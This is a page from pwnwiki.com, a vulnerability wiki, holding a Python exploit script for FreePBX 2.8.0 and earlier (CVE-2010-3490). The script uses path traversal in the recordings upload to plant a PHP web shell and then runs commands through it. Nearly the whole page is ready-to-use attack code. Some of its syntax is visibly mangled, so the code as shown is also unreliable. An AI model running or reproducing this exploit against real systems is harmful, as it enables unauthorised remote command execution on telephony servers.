pwnwiki.com
,
EXP
import requests
import random
import string
import sys
# Original advisory : http://www.exploit-db.com/exploits/15098/
print("devloop exploit for FreePBX <= 2.8.0 (CVE-2010-3490)")
if len(sys.argv) != 4:
print("Usage: {0} <url_to_freepbx_admin_directory> <username> <password>")
sys.exit()
BASE = sys.argv1
USER = sys.argv2
PASS = sys.argv3
KEYW = "devloop"
if not BASE.endswith("/"):
BASE += "/"
sess = requests.session()
creds = (USER, PASS)
r = sess.get(BASE + "config.php", auth=creds)
if "Logged in:" in r.content:
print("+ Connection successful")
else:
print("! Unable to login... check credentials and url")
sys.exit()
data = {
'action': 'recorded',
'display': 'recordings',
'usersnum': '../../../../../var/www/html/admin/{0}'.format(KEYW),
'rname': "".join(random.choice(string.hexdigits) for _ in xrange(10)),
'Submit': 'Save'
}
content = "<?php system($_GET'cmd'); ?>"
files = {
'ivrfile': ('backdoor.php', content, 'application/octet-stream')
}
hdrs = {"referer": BASE + "config.php?type=setup&display=recordings"}
r = sess.post(BASE + "config.php?type=setup&display=recordings",
data=data,
files=files,
auth=creds,
headers=hdrs)
print("i Testing shell at address {0}{1}-ivrrecording.php".format(BASE, KEYW))
r = requests.get(BASE + KEYW + "-ivrrecording.php?cmd=uname+-a", auth=creds)
if r.status_code != 200:
print("- Received HTTP code {0} for this url".format(r.status_code))
else:
print("HTTP 200 OK")
print r.content
免费、自由、人人可编辑的漏洞库
